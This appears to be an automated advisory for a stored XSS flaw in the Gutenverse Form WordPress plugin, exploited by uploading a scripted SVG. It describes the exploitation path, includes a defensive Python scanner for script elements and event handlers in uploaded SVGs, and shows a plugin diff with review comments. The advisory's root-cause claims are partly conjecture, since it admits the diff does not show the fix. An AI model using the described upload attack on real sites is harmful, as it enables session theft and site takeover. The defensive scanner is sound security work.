Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-14984: Gutenverse Form <= 2.3.2 – Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload (gutenverse-form)

Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 2.3.2
Patched Version: 2.4.0
Disclosed: January 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14984:
The Gutenverse Form WordPress plugin, versions up to and including 2.3.2, contains an authenticated stored cross-site scripting (XSS) vulnerability. The plugin’s framework component adds SVG as an allowed MIME type via the upload_mimes filter without sanitizing SVG file contents. Attackers with Author-level access or higher can upload malicious SVG files containing JavaScript, which executes when the file is viewed in a victim’s browser. This vulnerability has a CVSS score of 6.4 (Medium severity).

Atomic Edge research identifies the root cause in the plugin’s framework component, which modifies WordPress’s allowed MIME types. The plugin uses the upload_mimes filter to add SVG support without implementing content validation. The vulnerability manifests because the plugin framework (likely in a shared component) permits SVG uploads but does not sanitize or validate the XML content for malicious script elements. The code diff shows extensive changes to styling classes (class-form-input-date.php, class-form-input-email.php, etc.) that add SVG support to CSS selectors, indicating the plugin expanded SVG functionality without adding security controls.

Exploitation requires an authenticated attacker with at least Author privileges. The attacker uploads an SVG file containing JavaScript payloads within <script> tags or event handlers (like onload). The malicious file is uploaded through WordPress’s media upload system, typically via the /wp-admin/async-upload.php or /wp-admin/media-new.php endpoints. Once uploaded, the SVG file receives a public URL. When any user (including unauthenticated visitors) views the SVG file directly or embeds it in a page, the browser executes the embedded JavaScript in the victim’s context.

The patch in version 2.4.0 does not directly address the SVG upload vulnerability in the provided diff. The extensive code changes focus on adding SVG support to CSS selectors across multiple form input style classes (lines modified in class-form-input-date.php, class-form-input-email.php, etc.). These changes add ‘svg’ to CSS selectors alongside existing ‘i’ elements for icon styling. The patch appears to implement SVG icon functionality rather than fix the security issue. Atomic Edge analysis suggests the actual security fix likely occurs in a separate framework component not shown in this diff, possibly by removing SVG from upload_mimes or adding content sanitization.
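
The content check the analysis says is missing can also be run after the fact against the media library. The following is an added example, not code from the plugin or from Atomic Edge: it audits SVG bytes for script elements, event-handler attributes, script-scheme URLs and DTD entities (the last two go slightly beyond what the text lists). The function names, finding labels and sample SVGs are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Elements that execute script or embed foreign (HTML) content inside an SVG.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# URL schemes that run code when followed or loaded.
SCRIPT_URL = re.compile(r"^(javascript:|vbscript:|data:text/html)", re.I)
# Browsers ignore tabs/newlines inside a URL scheme, so strip them before matching.
CONTROL_AND_SPACE = re.compile(r"[\x00-\x20]+")


def local_name(name):
    """Drop an ElementTree '{namespace}' prefix and lowercase the rest."""
    return name.rsplit("}", 1)[-1].lower()


def audit_svg(data):
    """Return a list of findings for one SVG file's bytes; [] means nothing active found."""
    # ElementTree expands internal entities, so refuse them before parsing.
    # Removing NUL bytes makes the marker visible in UTF-16 encoded files too.
    if re.search(rb"<!ENTITY", data.replace(b"\x00", b""), re.I):
        return ["dtd-entity"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["unparseable"]  # not well-formed XML: hold for manual review

    findings = []
    for el in root.iter():
        tag = local_name(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"element:{tag}")
        for name, value in el.attrib.items():
            attr = local_name(name)
            if attr.startswith("on"):
                # onload, onclick, onbegin, ... on any element
                findings.append(f"handler:{tag}@{attr}")
            elif SCRIPT_URL.match(CONTROL_AND_SPACE.sub("", value)):
                # href / xlink:href, and animation attributes such as to= or values=
                findings.append(f"url:{tag}@{attr}")
    return findings


def scan_uploads(upload_dir):
    """Walk a directory (e.g. a copy of wp-content/uploads) and report flagged .svg files."""
    report = {}
    for path in sorted(Path(upload_dir).rglob("*")):
        if path.is_file() and path.suffix.lower() == ".svg":
            findings = audit_svg(path.read_bytes())
            if findings:
                report[str(path)] = findings
    return report


# Constructed sample inputs; the script bodies are inert placeholders.
NS = b'xmlns="http://www.w3.org/2000/svg"'
CLEAN_SVG = b'<svg ' + NS + b' viewBox="0 0 1 1"><rect width="1" height="1" fill="currentColor"/></svg>'
SCRIPT_SVG = b'<svg ' + NS + b'><script>/* constructed sample */</script></svg>'
HANDLER_SVG = b'<svg ' + NS + b' onload="void 0"><rect width="1" height="1"/></svg>'
JS_URL_SVG = (b'<svg ' + NS + b' xmlns:xlink="http://www.w3.org/1999/xlink">'
              b'<a xlink:href="java&#9;script:void(0)"><text>x</text></a></svg>')
ENTITY_SVG = b'<!DOCTYPE svg [<!ENTITY a "aaaa">]><svg ' + NS + b'>&a;</svg>'

if __name__ == "__main__":
    samples = {"clean": CLEAN_SVG, "script": SCRIPT_SVG, "handler": HANDLER_SVG,
               "js-url": JS_URL_SVG, "entity": ENTITY_SVG}
    for label, blob in samples.items():
        print(label, audit_svg(blob))
```

A finding means the file needs review or removal, not that it is certainly malicious; an empty result is a denylist pass, not proof of safety, so it complements rather than replaces a server-side allowlist sanitizer at upload time.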

Successful exploitation leads to stored XSS attacks. Attackers can steal session cookies, perform actions as the victim user, deface websites, or redirect users to malicious sites. For WordPress administrators viewing malicious SVGs, this could lead to full site compromise through plugin/theme installation, user creation, or content modification. The stored nature means a single upload can affect multiple users over time.

Differential between vulnerable and patched code

Code Diff
--- a/gutenverse-form/gutenverse-form.php
+++ b/gutenverse-form/gutenverse-form.php
@@ -4,7 +4,7 @@
  * Description: Powerful and intuitive form builder plugin designed to streamline the process of creating and managing forms on your WordPress website.
  * Plugin URI: https://gutenverse.com/
  * Author: Jegstudio
- * Version: 2.3.2
+ * Version: 2.4.0
  * Author URI: https://jegtheme.com/
  * License: GPLv3
  * Text Domain: gutenverse-form
@@ -15,7 +15,7 @@
 use Gutenverse_FormInit;

 defined( 'GUTENVERSE_FORM' ) || define( 'GUTENVERSE_FORM', 'gutenverse-form' );
-defined( 'GUTENVERSE_FORM_VERSION' ) || define( 'GUTENVERSE_FORM_VERSION', '2.3.2' );
+defined( 'GUTENVERSE_FORM_VERSION' ) || define( 'GUTENVERSE_FORM_VERSION', '2.4.0' );
 defined( 'GUTENVERSE_FORM_NOTICE_VERSION' ) || define( 'GUTENVERSE_FORM_NOTICE_VERSION', '1.0.0' );
 defined( 'GUTENVERSE_FORM_NAME' ) || define( 'GUTENVERSE_FORM_NAME', 'Gutenverse Form' );
 defined( 'GUTENVERSE_FORM_URL' ) || define( 'GUTENVERSE_FORM_URL', plugins_url( GUTENVERSE_FORM ) );
--- a/gutenverse-form/includes/class-editor-assets.php
+++ b/gutenverse-form/includes/class-editor-assets.php
@@ -35,13 +35,6 @@
 			GUTENVERSE_FORM_VERSION
 		);

-		wp_enqueue_style(
-			'gutenverse-form-frontend',
-			GUTENVERSE_FORM_URL . '/assets/css/frontend.css',
-			array( 'gutenverse-iconlist', 'fontawesome-gutenverse' ),
-			GUTENVERSE_FORM_VERSION
-		);
-
 		wp_enqueue_script( 'gutenverse-frontend-event' );

 		$include   = ( include GUTENVERSE_FORM_DIR . '/lib/dependencies/blocks.asset.php' )['dependencies'];
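
Review bot: with the 'gutenverse-form-frontend' enqueue removed here, nothing visible in this hunk pulls 'gutenverse-iconlist' or 'fontawesome-gutenverse' into the editor any more, since both were only declared as dependencies of that style. Confirm the editor still loads the two icon styles through another handle, or enqueue them directly.
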
--- a/gutenverse-form/includes/class-frontend-assets.php
+++ b/gutenverse-form/includes/class-frontend-assets.php
@@ -21,6 +21,62 @@
 	public function __construct() {
 		add_filter( 'gutenverse_include_frontend', array( $this, 'load_conditional_scripts' ) );
 		add_filter( 'gutenverse_include_frontend', array( $this, 'load_conditional_styles' ) );
+		add_filter( 'gutenverse_conditional_script_attributes', array( $this, 'font_icon_conditional_load' ), null, 3 );
+	}
+
+	/**
+	 * Icon conditional load
+	 *
+	 * @param mixed $conditions The value from the attributes array.
+	 *
+	 * @since 3.3.0
+	 */
+	private function icon_conditional_load( &$conditions ) {
+		$conditions[] = array(
+			'style' => 'fontawesome-gutenverse',
+		);
+
+		$conditions[] = array(
+			'style' => 'gutenverse-iconlist',
+		);
+
+		return $conditions;
+	}
+
+	/**
+	 * Load the font icon
+	 *
+	 * @param mixed  $conditions The value from the attributes array.
+	 * @param string $attrs The comparison operator (e.g., '===', '!==').
+	 * @param mixed  $block_name The value to compare against.
+	 *
+	 * @since 3.3.0
+	 */
+	public function font_icon_conditional_load( $conditions, $attrs, $block_name ) {
+		switch ( $block_name ) {
+			case 'gutenverse/form-input-submit':
+			case 'gutenverse/form-input-telp':
+			case 'gutenverse/form-input-text':
+			case 'gutenverse/form-input-textarea':
+			case 'gutenverse/form-input-number':
+			case 'gutenverse/form-input-email':
+			case 'gutenverse/form-input-date':
+				if ( isset( $attrs['showIcon'] ) && $attrs['showIcon'] ) {
+					if ( ! isset( $attrs['iconType'] ) || 'icon' === $attrs['iconType'] ) {
+						$this->icon_conditional_load( $conditions );
+					}
+				}
+				break;
+			case 'gutenverse/form-input-select':
+				if ( isset( $attrs['useCustomDropdown'] ) && $attrs['useCustomDropdown'] ) {
+					if ( ! isset( $attrs['dropDownIconOpenType'] ) || 'icon' === $attrs['dropDownIconOpenType'] || ! isset( $attrs['dropDownIconCloseType'] ) || 'icon' === $attrs['dropDownIconCloseType'] ) {
+						$this->icon_conditional_load( $conditions );
+					}
+				}
+				break;
+		}
+
+		return $conditions;
 	}

 	/**
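
Review bot: the add_filter() call for 'gutenverse_conditional_script_attributes' passes null as the priority argument; add_filter() expects an integer there (default 10), so pass 10 explicitly. The docblock of font_icon_conditional_load() also looks copied from another function: $attrs is described as "The comparison operator" and $block_name as "The value to compare against", and both new methods carry "@since 3.3.0" while this release is 2.4.0. icon_conditional_load() takes $conditions by reference and also returns it, and the caller ignores the return value, so keep only one of the two mechanisms.
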
@@ -34,7 +90,7 @@
 			'input-date',
 			'input-gdpr',
 			'input-multiselect',
-			'input-select'
+			'input-select',
 		);

 		foreach ( $blocks as $block ) {
@@ -60,7 +116,7 @@
 		wp_register_style(
 			'gutenverse-form-frontend-form-input-general-style',
 			GUTENVERSE_FORM_URL . '/assets/css/general-input.css',
-			array( 'fontawesome-gutenverse', 'gutenverse-iconlist' ),
+			array(),
 			GUTENVERSE_FORM_VERSION
 		);

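
Review bot: dropping 'fontawesome-gutenverse' and 'gutenverse-iconlist' from the dependencies of 'gutenverse-form-frontend-form-input-general-style' means the icon styles now reach the frontend only through font_icon_conditional_load(), whose switch covers submit, telp, text, textarea, number, email, date and select. The $blocks array in the previous hunk also lists 'input-gdpr' and 'input-multiselect'; if either of those renders a font icon, it needs a case in that switch or its own dependency.
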
@@ -86,10 +142,9 @@
 			wp_register_style(
 				'gutenverse-form-frontend-' . $block . '-style',
 				GUTENVERSE_FORM_URL . '/assets/css/frontend/' . $block . '.css',
-				array('gutenverse-form-frontend-form-input-general-style'),
+				array( 'gutenverse-form-frontend-form-input-general-style' ),
 				GUTENVERSE_FORM_VERSION
 			);
 		}
 	}
-
 }
--- a/gutenverse-form/includes/style/class-form-input-date.php
+++ b/gutenverse-form/includes/style/class-form-input-date.php
@@ -384,7 +384,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -470,11 +470,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
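
Review bot: the iconSize rule now applies "font-size: {$value}px;" to the new '.icon svg' selector, but font-size only resizes an inline SVG whose width and height are expressed in em. If the rendered SVG carries fixed dimensions, the size control has no effect when iconType is 'svg'; consider emitting width and height for the svg selector instead.
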
@@ -542,7 +542,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -566,7 +566,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -602,7 +602,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -626,9 +626,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -676,7 +674,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -700,9 +698,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-email.php
+++ b/gutenverse-form/includes/style/class-form-input-email.php
@@ -384,7 +384,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -470,11 +470,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -542,7 +542,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -566,7 +566,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -602,7 +602,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -626,9 +626,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -676,7 +674,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -700,9 +698,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-number.php
+++ b/gutenverse-form/includes/style/class-form-input-number.php
@@ -383,7 +383,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -469,11 +469,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -541,7 +541,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -565,7 +565,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -601,7 +601,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -625,9 +625,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -675,7 +673,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -699,9 +697,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-submit.php
+++ b/gutenverse-form/includes/style/class-form-input-submit.php
@@ -89,7 +89,7 @@
 			if ( 'after' === $this->attrs['iconPosition'] ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .guten-button i",
+						'selector'       => ".{$this->element_id} .guten-button i, .{$this->element_id} .guten-button svg",
 						'property'       => function ( $value ) {
 							return "margin-left: {$value}px;";
 						},
@@ -100,7 +100,7 @@
 			} else {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .guten-button i",
+						'selector'       => ".{$this->element_id} .guten-button i, .{$this->element_id} .guten-button svg",
 						'property'       => function ( $value ) {
 							return "margin-right: {$value}px;";
 						},
@@ -114,7 +114,7 @@
 		if ( isset( $this->attrs['iconSize'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .guten-button i",
+					'selector'       => ".{$this->element_id} .guten-button i, .{$this->element_id} .guten-button svg",
 					'property'       => function ( $value ) {
 						return $this->handle_unit_point( $value, 'font-size' );
 					},
@@ -153,7 +153,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button i",
+					'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button i, .{$this->element_id}.guten-button-wrapper .guten-button svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -179,7 +179,7 @@
 		if ( isset( $this->attrs['hoverIconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button:hover i",
+					'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button:hover i, .{$this->element_id}.guten-button-wrapper .guten-button:hover svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -203,7 +203,7 @@
 				$this->inject_style(
 					array(
 						'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button span",
-						'property'       => function ( $value ) {
+						'property'       => function () {
 							return 'height: 15px; ';
 						},
 						'value'          => '',
@@ -330,8 +330,8 @@
 			if ( $this->attrs['iconLineHeight'] ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button i",
-						'property'       => function ( $value ) {
+						'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button i, .{$this->element_id}.guten-button-wrapper .guten-button svg",
+						'property'       => function () {
 							return 'line-height: normal';
 						},
 						'value'          => $this->attrs['iconLineHeight'],
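
Review bot: in the iconLineHeight rule the 'property' callback takes no argument and always returns 'line-height: normal', so the 'value' => $this->attrs['iconLineHeight'] passed next to it is never used, and the returned declaration has no trailing semicolon, unlike 'height: 15px; ' in the hunk above. Either emit the configured line height or drop the unused value. The guard "if ( $this->attrs['iconLineHeight'] )" also reads the key without isset().
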
--- a/gutenverse-form/includes/style/class-form-input-telp.php
+++ b/gutenverse-form/includes/style/class-form-input-telp.php
@@ -384,7 +384,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
